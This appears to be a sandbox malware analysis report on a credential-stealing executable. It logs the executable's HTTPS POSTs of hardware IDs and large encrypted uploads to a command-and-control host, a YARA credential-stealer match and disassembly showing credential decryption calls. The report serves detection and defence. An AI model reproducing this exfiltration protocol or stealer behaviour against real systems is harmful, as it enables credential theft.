                                                                                                                                                                                                                                              2024-12-28 08:56:42 UTC1269OUTData Raw: 2d 2d 44 58 53 5a 4f 4e 38 36 55 39 51 50 57 36 51 44 4e 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 32 33 45 31 31 32 39 42 36 38 35 34 34 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 44 58 53 5a 4f 4e 38 36 55 39 51 50 57 36 51 44 4e 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 58 53 5a 4f 4e 38 36 55 39 51 50 57 36 51 44 4e 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                                                                                                                                              Data Ascii: --DXSZON86U9QPW6QDNTContent-Disposition: form-data; name="hwid"D723E1129B685441BEBA0C6A975F1733--DXSZON86U9QPW6QDNTContent-Disposition: form-data; name="pid"1--DXSZON86U9QPW6QDNTContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                                                                                                                                              2024-12-28 08:56:43 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:43 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=tgv4lh1uetlf1nq64acp6488li; expires=Wed, 23 Apr 2025 02:43:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7KhPmFndX7pP3rF2sf3fPycIx%2FhLiUZErvaCbNlTXXOE3SbXJjsG8tV1qPUqtHg2byQaAV8IOwprfGa78uO%2Ba%2BOs9KnB9MBnU3Ok2s%2BVDKypL1%2B596mOzbD%2FjrnVqsNGB6Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f9056b31a6d43b5-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1570&rtt_var=599&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2185&delivery_rate=1809169&cwnd=228&unsent_bytes=0&cid=bf4a5e6b04d963a6&ts=1163&x=0"
                                                                                                                                                                                                                                              2024-12-28 08:56:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-28 08:56:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              7192.168.2.549731104.21.66.864435856C:\Users\user\Desktop\3LUyRfIoKs.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=X7RLJH0RQFVBV0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 551089
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC15331OUTData Raw: 2d 2d 58 37 52 4c 4a 48 30 52 51 46 56 42 56 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 32 33 45 31 31 32 39 42 36 38 35 34 34 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 58 37 52 4c 4a 48 30 52 51 46 56 42 56 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 37 52 4c 4a 48 30 52 51 46 56 42 56 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 58 37 52 4c 4a 48 30 52
                                                                                                                                                                                                                                              Data Ascii: --X7RLJH0RQFVBV0Content-Disposition: form-data; name="hwid"D723E1129B685441BEBA0C6A975F1733--X7RLJH0RQFVBV0Content-Disposition: form-data; name="pid"1--X7RLJH0RQFVBV0Content-Disposition: form-data; name="lid"PsFKDg--pablo--X7RLJH0R
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC15331OUTData Raw: 28 35 17 c0 7e a1 bd 22 0e de 29 b7 54 1b 35 2d 45 7f c7 9d f3 33 7b a2 18 2f bb f5 4b 96 9c e2 2d 7b 63 c7 d3 fc 2d ad 1e 8f fb be 02 8b 3a 92 09 dd 3f 84 51 06 66 a3 55 fc 0b 45 52 e3 b2 12 85 69 96 2e d0 a5 54 c9 b8 b5 4c 16 65 48 f4 52 45 e2 78 46 04 c9 da b4 dd 57 b6 e2 51 2d 2c 21 29 b9 9d a1 1c 09 0b 25 7a b3 66 a7 77 0b 82 65 21 46 32 b5 e8 34 2e d0 1e 4d 2d d9 ea 74 7c 9a 5c e9 f1 1c 0f 7b 41 15 22 52 69 9f 20 7a 8c 34 2b 3d 0a 4a 9d 70 66 e8 e2 59 22 cd 97 0f 32 1d 60 47 ee 22 bb 4e 01 b5 ca 0f e8 4b 22 5b 3b d1 f0 9c 76 2b 60 16 85 54 f2 a1 40 7d e9 b1 22 2b d8 7a cb c8 55 c8 6e ed 9e 54 d3 73 a6 fd e5 f7 ae 60 ad fc 88 cd 3b ad cd 95 8a 7d eb 73 ae f6 6f 07 5f e0 fa 4b 9d 5d 0b 04 1c dc de 6e ac 27 67 f9 0c ee 3f 25 7b 0a 24 26 71 17 71 02 20
                                                                                                                                                                                                                                              Data Ascii: (5~")T5-E3{/K-{c-:?QfUERi.TLeHRExFWQ-,!)%zfwe!F24.M-t|\{A"Ri z4+=JpfY"2`G"NK"[;v+`T@}"+zUnTs`;}so_K]n'g?%{$&qq
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC15331OUTData Raw: 6a b7 16 9f a7 24 79 e8 57 6a 33 24 cf 90 ff f3 88 38 aa 5a a1 21 f1 c0 40 a0 2e 5e 5d 52 ee 82 75 a6 50 75 78 f8 c1 71 5a e3 ba 69 42 e6 7c 17 9b 69 58 a1 f6 cd d0 7a e6 45 9a c8 b8 2c f7 f5 36 e2 2d 23 5d dc 41 db 84 d6 4b 0f 5e 2b 7b 91 7a 09 87 46 ea ad 6b 4e 56 9f 46 64 ff 86 45 57 c5 5f 4d 65 b7 fc 37 06 5c e9 29 0e 01 b3 05 93 9a 5d 76 8f 78 df 2a 39 ae 77 d9 06 9e 28 c1 73 c0 6f e0 fb d6 5f bc 9f ff 66 b5 cd 73 99 d5 cb b6 43 1b 17 ee 76 5e 74 79 ed c8 6b 12 f9 e1 16 ec 1e b0 51 69 bf 7e 49 d7 9d 3b 1f b4 a4 de fe f3 4f 15 34 5d 15 a4 85 32 0a 85 2b 0c 21 ea c4 a3 cf fa cf 0d b9 6b 3b 65 38 4b 80 85 c2 cf 0d ba 41 60 68 16 c1 5c 2e 3f 00 23 fe 6a aa c1 2d c0 4a ff a6 76 5d 1b fc 2a 45 54 80 17 60 5e fe 7d 07 20 f9 2b a0 5b 58 18 11 08 3f d0 8c 87
                                                                                                                                                                                                                                              Data Ascii: j$yWj3$8Z!@.^]RuPuxqZiB|iXzE,6-#]AK^+{zFkNVFdEW_Me7\)]vx*9w(so_fsCv^tykQi~I;O4]2+!k;e8KA`h\.?#j-Jv]*ET`^} +[X?
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC15331OUTData Raw: db bf 93 e8 00 87 07 fa a9 7c de 2b 90 fa 9a 42 e8 5e 34 92 b3 53 2b 0e bb 41 8c 3a 73 5e 74 84 f6 ee 5f 13 b3 f7 6e 7d f5 28 02 20 2b 7a 75 c9 a4 29 47 4c 2a 75 a3 19 dd 97 66 91 ea 44 1c 45 16 fc 9f 1e 21 ff ed ee 4f fd 7b 65 97 fe 2f 08 01 47 d3 20 ad 89 10 f3 5a 02 c8 f6 f4 e4 78 fa 81 7a d7 1d 07 5f 85 04 36 fb a1 c9 0f 60 57 b1 68 69 78 b3 53 60 f1 2e 20 7b 5a 81 d1 f9 cf 7e fd 91 ad 98 f5 30 b0 26 c9 15 56 5a b4 03 f0 97 c1 77 c3 95 de eb 0f ab 2a 7f cf 5d ce d3 f3 6e 47 9f 17 c0 96 58 a9 31 92 0d 81 02 81 e6 71 52 50 3b 47 63 2a a3 27 3e 87 f1 aa c3 49 17 4d 4b b3 40 52 cd 8b 2d 9b c2 e9 c1 1a b8 a0 9a fc 19 d6 d3 1b 63 dd 91 93 b3 cc ba 18 72 b5 b1 39 c9 41 62 6d 50 7f 39 a1 10 cb ac 37 79 50 6d c4 20 dd a1 59 37 fb a8 54 11 87 18 13 02 2f 4e da
                                                                                                                                                                                                                                              Data Ascii: |+B^4S+A:s^t_n}( +zu)GL*ufDE!O{e/G Zxz_6`WhixS`. {Z~0&VZw*]nGX1qRP;Gc*'>IMK@R-cr9AbmP97yPm Y7T/N
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC15331OUTData Raw: 3f 47 71 15 b4 ec 15 aa f2 be 96 2a 0d 6b 77 bf 6d 22 29 70 b6 f4 e6 c7 91 72 24 d6 c7 cf 6f 3f 24 d4 d0 69 cc bd 86 83 a0 8d ad a4 e2 26 47 08 0d 61 a1 15 fc 2a 58 27 66 ef 25 d1 1e db 6f 63 0f a7 a0 2a f9 87 09 2f f2 9b df d5 cf 5d 5f 08 8f bd d6 77 20 a8 0d 9f 17 15 be 03 a8 87 d2 93 84 5d 9d 53 7d 84 ce 01 e4 91 57 29 0f 26 a3 c8 d1 5e d0 3b 85 04 40 18 80 fc f6 f7 fe 6d 3c 10 b5 7a 14 27 2d dc 90 b1 ab b9 2e 8c 9f 5f 8a fd 4b 5c 4c 01 2b 72 80 be 1c d8 2a 54 b5 09 97 7a 7e 7c 6d 58 ce 88 63 3d ba 11 51 e1 a2 10 ca 0f 7e 7a c8 dc 68 39 8d 85 bd ff 78 1e ad 72 4a 51 68 a9 8b e4 07 16 8b c0 3f 37 ad d9 f2 ae c5 0f bf dc 3a fa f8 08 a7 9c f5 6e 59 93 2c 33 7e 54 d0 74 cf c4 db 19 86 26 90 45 d1 4a e2 18 72 00 ce 57 62 9f c6 5e bd 74 6f 38 43 09 ec 0c fc
                                                                                                                                                                                                                                              Data Ascii: ?Gq*kwm")pr$o?$i&Ga*X'f%oc*/]_w ]S}W)&^;@m<z'-._K\L+r*Tz~|mXc=Q~zh9xrJQh?7:nY,3~Tt&EJrWb^to8C
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC15331OUTData Raw: 79 0d 4b 3f 30 e0 d3 06 f3 e7 1b d7 85 0d 7f aa e4 87 08 5e d1 29 6c 56 13 ec 2c 9d ef 8f 8c 31 3c 8f ec e7 75 49 6f 28 f0 f9 9c 95 e3 2e 1d 86 6a eb 37 4d 50 89 02 f3 f3 b7 84 a7 bf 02 7a fc a7 f9 d2 1b ec 74 40 29 85 e0 4c ef 23 c8 cd 23 bc c2 1c be 0d f4 ea e7 5a 2c 1c eb b7 e5 c4 6b 9f 2b fd 93 8d 0e 14 81 d1 6a a4 50 01 23 ad b8 ea 8c 6f f3 16 2c b8 b2 e1 7f 5a 1a 52 92 40 88 4c e2 b7 6f 2e 20 f8 c4 4f 8b 7c 27 8e ef a4 54 03 82 e2 d5 8d e7 03 b2 f0 2f 34 b0 87 06 b1 80 2c 2b f1 8d 44 17 83 e8 16 e7 04 d2 70 60 0f 4a e1 f7 21 ba 17 81 b0 df 13 94 dd 40 f2 45 a7 06 02 3e fe 07 de b5 f7 ca 97 f3 4e 58 57 14 1f 33 2f f1 8b 23 f6 ad af c4 aa 8a c8 37 3b 8a df e1 c2 da c9 c5 a9 27 e8 2e be 08 f5 65 f3 bd 63 96 6f 21 bd 45 25 ab c1 d4 86 1a 88 32 94 40 76
                                                                                                                                                                                                                                              Data Ascii: yK?0^)lV,1<uIo(.j7MPzt@)L##Z,k+jP#o,ZR@Lo. O|'T/4,+Dp`J!@E>NXW3/#7;'.eco!E%2@v
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC15331OUTData Raw: 2b 09 59 5f 0b fc 93 4d a1 85 8c b5 f8 f1 b8 1b 3f 5a a9 ab e5 e7 d1 d4 01 9e 2f cf 76 b9 22 3c 5b 49 8f 58 b3 e7 42 cc 5a e6 91 a5 7f 0f 1f 59 5a 67 51 0d 5f f5 f6 87 7c 0c 6f 07 4e ad dc 1a 6f 8e fe d5 d1 ff a6 b6 b2 c6 00 e3 ee 91 90 95 7e 39 20 0e bc 3c ff 6f 45 a8 b6 21 9f d7 6d 51 ff b3 27 65 2d ce 7e 75 7b e7 93 c8 ad 9a f6 40 85 a4 0c 2b d3 bd 4b 4e 4c 87 2f 21 75 4c f0 a9 0d 4a a8 a3 c9 58 67 01 81 cb bd 51 a5 bb 48 2d df d0 2f ff ff b5 82 c1 c1 9b ab 46 af 80 b6 78 ba 38 c8 92 46 2b e9 83 63 d8 e2 b6 52 0d 91 6f f7 e1 88 a3 f3 06 11 dc ad 0e 38 48 72 fd a4 91 b6 0c 80 27 d7 7f a9 d7 7b 0b 51 b4 a2 4b bf cd 64 ba ac 17 90 9c 5a c7 23 4b b0 db 53 79 6e af d1 ae 37 4d df a2 3e da 86 45 26 03 77 c0 ef 76 9a 60 4f 35 2c ee 00 45 ff 43 38 5b a0 f7 87
                                                                                                                                                                                                                                              Data Ascii: +Y_M?Z/v"<[IXBZYZgQ_|oNo~9 <oE!mQ'e-~u{@+KNL/!uLJXgQH-/Fx8F+cRo8Hr'{QKdZ#KSyn7M>E&wv`O5,EC8[
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC15331OUTData Raw: 62 17 56 89 49 7b b2 a8 d8 ec 20 df f8 c7 ff 64 a3 c0 6b 56 d7 de 62 e7 4c 8e 8f ff 59 9a 7a e7 51 69 e2 98 fa d3 aa 31 f2 5a d5 96 f8 82 d8 98 57 05 0c 58 94 c6 b3 ed e2 15 d3 49 7d e9 fd e6 4f 3e 28 8c f9 e7 69 88 5b bc fb d5 3a 39 1e 4e 8d 1f a4 7c b7 3c f7 a4 3c 48 56 fc 58 5d 46 10 e1 94 83 57 d5 2f 92 87 c6 ce cc 42 6c 40 fc fb 9f 90 cf 93 30 07 71 73 30 0a 78 4a d3 eb 1a 9c 9c 33 aa 2d c5 c1 f4 36 5e cb 9e f8 30 c1 fe d8 60 e2 a2 dc 6f 68 ee 68 48 79 1e 10 8c 28 ac e5 d8 7f 23 9c 56 35 c2 ca bd b9 e5 52 50 1b 84 24 9a d8 e8 b1 fe 42 fd 95 89 2e 8b a0 29 c4 2f 4f db 1d 1f 24 4c fd 82 8f 94 ee 69 1f 7d fa be 84 f1 be e9 b5 f4 d6 df 9f 06 b3 c8 64 ce ad a4 c4 75 9a 31 81 4f d5 8f f7 13 db ea da 0a 10 31 39 71 0f b2 e9 dc ec 3b 2c 75 70 2b c0 d0 a3 c7
                                                                                                                                                                                                                                              Data Ascii: bVI{ dkVbLYzQi1ZWXI}O>(i[:9N|<<HVX]FW/Bl@0qs0xJ3-6^0`ohhHy(#V5RP$B.)/O$Li}du1O19q;,up+
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC15331OUTData Raw: da 90 65 e9 91 4d 7f 10 0f 69 d2 ed fc da 94 26 a2 f4 e2 81 6a 33 f7 d5 6d cb e4 49 68 1e cc 10 84 94 2e 59 be 3f 09 c5 af 59 c3 a6 3c 7f e3 e9 26 57 dd ce 1c 53 7d 97 84 d4 94 a7 d5 09 f2 3f 2d eb 4f 49 5f 24 5d ab fe 50 a5 3a e3 3a 62 ab 44 e0 d7 f5 93 d2 a0 ec 3c 2a ca 22 ca d2 cc da 59 d3 53 cd 32 43 07 77 68 74 bf 65 2c 63 13 c8 0e c0 ca 2b d5 06 ec 6e 79 7a 2d 58 14 24 c7 49 47 59 c4 c6 84 d7 ee 8e 68 4d ef 8d 84 32 57 82 ff e7 f5 10 d9 ff 7e bd 64 7a bb ff 81 38 c8 c2 61 fe 3f 07 68 8a 4c b7 c5 c2 f7 62 f3 15 4e 77 5e b3 fe 1c bf 49 a6 6a 82 5a 4d 2d 41 db 1e db 25 a7 1a 6d ff 1e ab 64 44 ff 3e c4 91 ca 3d 31 22 4a 1f 62 a5 a2 ab 1a c4 94 e4 bc 09 c4 3f e2 61 4d b6 d2 5d db 77 74 c9 6d 97 ca 9c 7a 10 f3 70 e0 e3 af bb da f4 87 da ec 3b 78 a0 bf 7a
                                                                                                                                                                                                                                              Data Ascii: eMi&j3mIh.Y?Y<&WS}?-OI_$]P::bD<*"YS2Cwhte,c+nyz-X$IGYhM2W~dz8a?hLbNw^IjZM-A%mdD>=1"Jb?aM]wtmzp;xz
                                                                                                                                                                                                                                              2024-12-28 08:56:45 UTC15331OUTData Raw: 82 b6 8b cb ec 7d 1a 4d aa 36 a3 68 b0 69 4e 1f 0c 15 fb 3c 70 12 66 a9 a6 e1 27 1c 01 d3 b6 4b 0d d6 d8 79 f9 8f 19 b4 24 4d 90 01 17 b6 26 67 1e 64 66 06 71 ef fd eb ed d4 68 11 e9 c0 48 c7 c6 3f dd 28 f5 79 75 54 61 23 a6 e1 49 95 cf 09 f9 c9 f7 2b 7e 5b a8 e6 b5 4c 31 e8 af 2f d5 aa f2 4b e5 7b 85 df 7c a9 c6 fe 47 18 78 73 d0 a2 b4 44 87 02 87 9f 8e f7 25 b3 d3 a3 cc bb 64 a5 2e 77 57 5b 11 f4 9a 8c c1 28 11 33 51 78 e8 54 9e a1 7b dc fb ba b3 b4 9e 42 d3 8f b5 70 d0 59 da 56 f1 4d ff f2 7e 2c 66 f1 e0 e0 5f 15 7e 12 54 d2 f0 90 2a dd 36 26 76 8d f2 d9 68 bd de c1 b0 25 b3 ea 3d 2a d3 07 3e 85 43 a8 8b fb 53 fc 2c 83 e6 be bf 31 1c eb 7d 3c 9b 48 76 e0 c9 2f 9c 3f ed e2 55 e3 5e 13 82 92 93 03 76 21 19 8d a8 23 37 97 2c 14 9b a4 f9 2f 89 6f 68 a4 19
                                                                                                                                                                                                                                              Data Ascii: }M6hiN<pf'Ky$M&gdfqhH?(yuTa#I+~[L1/K{|GxsD%d.wW[(3QxT{BpYVM~,f_~T*6&vh%=*>CS,1}<Hv/?U^v!#7,/oh
                                                                                                                                                                                                                                              2024-12-28 08:56:47 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:47 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ac5qdjff86n50mtmkiv440lu5s; expires=Wed, 23 Apr 2025 02:43:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m5dzvBQC5ZCM8bu0WmoNM8tpmV3Mrt9eU7Nu0c4DhbgqpoV%2BoW7%2Fh%2FYs4uwpBNbxSDvv6fOTF6S%2FMED8FI9FcxdUk4z7RIKDNpdtE6cuiY14ruaeHFk477SrRPR1l81cWLc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f9056c50f0742d0-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1583&rtt_var=612&sent=196&recv=572&lost=0&retrans=0&sent_bytes=2836&recv_bytes=553565&delivery_rate=1762220&cwnd=207&unsent_bytes=0&cid=9a918cff7bf79569&ts=2754&x=0"


                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:03:56:20
                                                                                                                                                                                                                                              Start date:28/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\3LUyRfIoKs.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\3LUyRfIoKs.exe"
                                                                                                                                                                                                                                              Imagebase:0xaa0000
                                                                                                                                                                                                                                              File size:1'836'544 bytes
                                                                                                                                                                                                                                              MD5 hash:E17BAAB743930B14A8D9A54086F091D6
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:3%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:74.3%
                                                                                                                                                                                                                                                Total number of Nodes:284
                                                                                                                                                                                                                                                Total number of Limit Nodes:29
                                                                                                                                                                                                                                                execution_graph 20077 af952e VirtualAlloc 20078 af9c48 20077->20078 20285 aaa369 20286 aaa430 20285->20286 20286->20286 20289 aab100 20286->20289 20288 aaa479 20291 aab190 20289->20291 20290 aab1b5 20290->20288 20291->20290 20291->20291 20293 ade0a0 20291->20293 20294 ade0c0 20293->20294 20295 ade0f3 20293->20295 20297 ade0d4 20293->20297 20298 ade0e8 20293->20298 20294->20295 20294->20297 20296 adc570 RtlFreeHeap 20295->20296 20296->20298 20299 ade0d9 RtlReAllocateHeap 20297->20299 20298->20291 20299->20298 20079 adea29 20080 adea50 20079->20080 20082 adea8e 20080->20082 20086 ade110 LdrInitializeThunk 20080->20086 20085 ade110 LdrInitializeThunk 20082->20085 20084 adeb59 20085->20084 20086->20082 20087 ad0b2b CoSetProxyBlanket 20301 acc9eb 20304 acc8e2 20301->20304 20302 accab5 20304->20302 20305 ade110 LdrInitializeThunk 20304->20305 20305->20304 20306 ade967 20307 ade980 20306->20307 20310 ade110 LdrInitializeThunk 20307->20310 20309 ade9ef 20310->20309 20088 ab1227 20089 ab1241 20088->20089 20090 ab14e5 RtlExpandEnvironmentStrings 20089->20090 20091 aaf444 20089->20091 20093 ab1562 20090->20093 20093->20091 20094 ab57c0 20093->20094 20095 ab57e0 20094->20095 20095->20095 20130 ae1320 20095->20130 20097 ab5cad 20115 ab594e 20097->20115 20126 ab5cf7 20097->20126 20145 ae1650 LdrInitializeThunk 20097->20145 20098 ab590f 20098->20097 20104 ab5ae8 20098->20104 20107 ab5b92 20098->20107 20098->20115 20139 ae1720 20098->20139 20099 ab58ed 20099->20097 20099->20098 20099->20104 20099->20107 20099->20115 20138 ae1650 LdrInitializeThunk 20099->20138 20104->20115 20150 ade110 LdrInitializeThunk 20104->20150 20106 ae1720 LdrInitializeThunk 20106->20126 20107->20107 20108 ae1320 LdrInitializeThunk 20107->20108 20108->20097 20109 ab6319 20148 ab9ad0 FreeLibrary FreeLibrary RtlFreeHeap LdrInitializeThunk 20109->20148 20113 ab6338 20122 ab66be 20113->20122 20128 ab634d 20113->20128 20114 ab6f0e 20115->20091 20116 ab65bd 20149 abc8a0 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 20116->20149 20117 ab60b5 CryptUnprotectData 20118 ab60df 20117->20118 20117->20126 20118->20091 20118->20109 20118->20118 20118->20128 20147 abc8a0 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 20118->20147 20127 ab6792 20122->20127 20151 ade110 LdrInitializeThunk 20122->20151 20123 ab731b 20125 ab68eb 20125->20114 20153 ade110 LdrInitializeThunk 20125->20153 20126->20106 20126->20117 20126->20118 20146 ade110 LdrInitializeThunk 20126->20146 20127->20125 20152 ade110 LdrInitializeThunk 20127->20152 20128->20115 20128->20116 20128->20128 20134 ae14b0 20128->20134 20131 ae1340 20130->20131 20131->20131 20132 ae145e 20131->20132 20154 ade110 LdrInitializeThunk 20131->20154 20132->20099 20135 ae14d0 20134->20135 20136 ae15fe 20135->20136 20155 ade110 LdrInitializeThunk 20135->20155 20136->20128 20138->20098 20140 ae1750 20139->20140 20143 ae17a9 20140->20143 20156 ade110 LdrInitializeThunk 20140->20156 20142 ab593f 20142->20097 20142->20104 20142->20107 20142->20115 20143->20142 20157 ade110 LdrInitializeThunk 20143->20157 20145->20126 20146->20126 20147->20109 20148->20113 20149->20115 20150->20122 20151->20127 20152->20125 20153->20123 20154->20132 20155->20136 20156->20143 20157->20142 20158 adc5a0 20159 adc5d0 20158->20159 20162 adc62e 20159->20162 20166 ade110 LdrInitializeThunk 20159->20166 20160 adc801 20162->20160 20165 adc749 20162->20165 20167 ade110 LdrInitializeThunk 20162->20167 20168 adc570 20165->20168 20166->20162 20167->20165 20169 adc585 20168->20169 20170 adc583 20168->20170 20171 adc58a RtlFreeHeap 20169->20171 20170->20160 20171->20160 20172 ad8ea0 20173 ad8ec5 20172->20173 20176 ad8fc9 20173->20176 20181 ade110 LdrInitializeThunk 20173->20181 20175 ad9210 20176->20175 20178 ad90e1 20176->20178 20180 ade110 LdrInitializeThunk 20176->20180 20178->20175 20182 ade110 LdrInitializeThunk 20178->20182 20180->20176 20181->20173 20182->20178 20311 ade760 20312 ade780 20311->20312 20313 ade7be 20312->20313 20315 ade110 LdrInitializeThunk 20312->20315 20315->20313 20183 ae0d20 20184 ae0d2f 20183->20184 20188 ae0e98 20184->20188 20191 ade110 LdrInitializeThunk 20184->20191 20185 ae114b 20187 adc570 RtlFreeHeap 20187->20185 20188->20185 20190 ae108e 20188->20190 20192 ade110 LdrInitializeThunk 20188->20192 20190->20187 20191->20188 20192->20190 20316 aacc7a 20317 aacc86 20316->20317 20342 ac42d0 20317->20342 20319 aacca8 20353 ac4560 20319->20353 20321 aaccc4 20364 ac7440 20321->20364 20325 aaccef 20382 ac9e80 20325->20382 20327 aaccf8 20386 ac90d0 20327->20386 20329 aacd14 20330 ac42d0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 20329->20330 20331 aacd6e 20330->20331 20332 ac4560 RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 20331->20332 20333 aacd8a 